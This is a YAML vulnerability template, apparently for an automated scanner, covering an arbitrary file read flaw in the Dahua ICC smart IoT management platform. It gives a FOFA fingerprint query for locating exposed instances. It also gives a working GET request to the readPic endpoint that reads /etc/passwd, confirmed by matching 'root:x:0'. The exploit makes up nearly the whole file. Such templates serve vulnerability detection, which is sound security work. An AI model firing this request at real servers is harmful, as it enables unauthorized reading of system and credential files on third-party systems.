product: 大华智能物联综合管理平台
vName: 大华智能物联综合管理平台 readpic任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 大华ICC智能物联综合管理平台存在任意文件读取漏洞，攻击者利用此漏洞可以获取服务器敏感文件，造成敏感信息泄漏。
version: ''
note: ''
search:
  FOFA: body="static/fontshd/font-hd.css" || body="客户端会小于800"
protocol: http
link: https://blog.csdn.net/qq_53003652/article/details/134201046
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and